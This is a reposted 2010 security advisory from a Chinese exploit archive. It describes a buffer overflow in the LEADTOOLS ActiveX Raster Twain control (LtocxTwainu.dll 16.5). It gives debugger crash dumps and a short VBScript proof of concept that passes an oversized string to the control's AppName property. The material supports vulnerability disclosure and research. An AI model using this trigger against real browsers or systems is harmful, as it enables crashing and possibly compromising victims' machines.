首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Leadtools ActiveX Raster Twain v16.5 (LtocxTwainu.dll) Buffer Overflow Vulnerabi
来源:liquidworm gmail com 作者:LiquidWorm 发布时间:2010-08-30  

LEADTOOLS ActiveX Raster Twain v16.5 (LtocxTwainu.dll) Remote Buffer Overflow PoC


Vendor: LEAD Technologies, Inc.
Product Web Page: http://www.leadtools.com
Affected Version: 16.5.0.2

Summary: With LEADTOOLS you can control any scanner, digital camera
or capture card that has a TWAIN (32 and 64 bit) device driver.
High-level acquisition support is included for ease of use while
low-level functionality is provided for flexibility and control in
even the most demanding scanning applications.

Desc: The Raster Twain Object Library suffers from a buffer overflow
vulnerability because it fails to check the boundry of the user input.


Tested On: Microsoft Windows XP Professional SP3 (EN)
           Windows Internet Explorer 8.0.6001.18702
           RFgen Mobile Development Studio 4.0.0.06 (Enterprise)


===============================================================

(2c4.2624): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00130041 ebx=100255bc ecx=01649000 edx=00183984 esi=0013ef6c edi=00000000
eip=7c912f4e esp=0013eda8 ebp=0013eda8 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
ntdll!wcscpy+0xe:
7c912f4e 668901          mov     word ptr [ecx],ax        ds:0023:01649000=????
0:000> g
(2c4.2624): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00410039 ebx=00410039 ecx=00150000 edx=00150608 esi=00150000 edi=00410041
eip=7c96c540 esp=0013f220 ebp=0013f228 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
ntdll!RtlpNtMakeTemporaryKey+0x6a74:
7c96c540 807b07ff        cmp     byte ptr [ebx+7],0FFh      ds:0023:00410040=??

==================================================================


Registers:
--------------------------------------------------
EIP 7C912F4E
EAX 00130041
EBX 100255BC -> 10014840 -> Asc: @H@H
ECX 01649000
EDX 001839DC -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EDI 00000000
ESI 0013EF6C -> BAAD0008
EBP 0013EDA8 -> 0013EDDC
ESP 0013EDA8 -> 0013EDDC

--

EIP 7C96C540
EAX 00410039
EBX 00410039
ECX 00150000 -> 000000C8
EDX 00150608 -> 7C97B5A0
EDI 00410041
ESI 00150000 -> 000000C8
EBP 0013F228 -> 0013F278
ESP 0013F220 -> 00150000


ArgDump:
--------------------------------------------------
EBP+8 016479B0 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+12 0018238C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16 00000000
EBP+20 0013EF6C -> BAAD0008
EBP+24 100255BC -> 10014840 -> Asc: @H@H
EBP+28 0013EDB8 -> 00000000

--

EBP+8 00150000 -> 000000C8
EBP+12 00410039
EBP+16 7C96DBA4 -> Asc: RtlGetUserInfoHeap
EBP+20 00000000
EBP+24 00410041
EBP+28 7C80FF12 -> 9868146A


CompanyName  LEAD Technologies, Inc.
FileDescription  LEADTOOLS ActiveX Raster Twain (Win32)
FileVersion  16,5,0,2
InternalName  LTRTNU
LegalCopyright  © 1991-2009 LEAD Technologies, Inc.
OriginalFileName  LTRTNU.DLL
ProductName  LEADTOOLS® for Win32
ProductVersion  16.5.0.0


Report for Clsid: {00165752-B1BA-11CE-ABC6-F5B2E79D9E3F}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: False


Exception Code: ACCESS_VIOLATION

Disasm: 7C912F4E MOV [ECX],AX (ntdll.dll)
Disasm: 7C96C540 CMP BYTE PTR [EBX+7],FF (ntdll.dll)


Exception Code: BREAKPOINT

Disasm: 7C90120E INT3 (ntdll.dll)

Seh Chain:
--------------------------------------------------
1  7C839AC0  KERNEL32.dll
2  FC2950   VBSCRIPT.dll
3  7C90E900  ntdll.dll


7C912F4E MOV [ECX],AX   <--- CRASH
7C96C540 CMP BYTE PTR [EBX+7],FF  <--- CRASH
7C90120F RETN    <--- CRASH


==================================================================


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com

Zero Science Lab - http://www.zeroscience.mk

24.08.2010


Zero Science Lab Advisory ID: ZSL-2010-4960
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4960.php

 

PoC:


<object classid='clsid:00165752-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
<script language='vbscript'>

targetFile = "C:\Program Files\RFGen40\LtocxTwainu.dll"
prototype  = "Property Let AppName As String"
memberName = "AppName"
progid     = "LTRASTERTWAINLib_U.LEADRasterTwain_U"
argCount   = 1

arg1=String(9236, "A")

target.AppName = arg1

</script>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·McAfee LinuxShield <= 1.5.1 Lo
·Blogman v0.7.1 (profile.php) S
·Linux Kernel < 2.6.36-rc1 CAN
·nginx v0.6.38 Heap Corruption
·SnackAmp 3.1.2 Malicious SMP B
·Exploit Title: Mozilla Thunder
·SnackAmp 3.1.2 Malicious WAV B
·mini CMS / News Script Light 1
·bsd/x86-bindshell on port 2525
·Hycus CMS 1.0.1 Multiple Cross
·Mozilla Firefox 3.6.8 Adobe Re
·PuTTY 0.60 DLL Hijacking Explo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved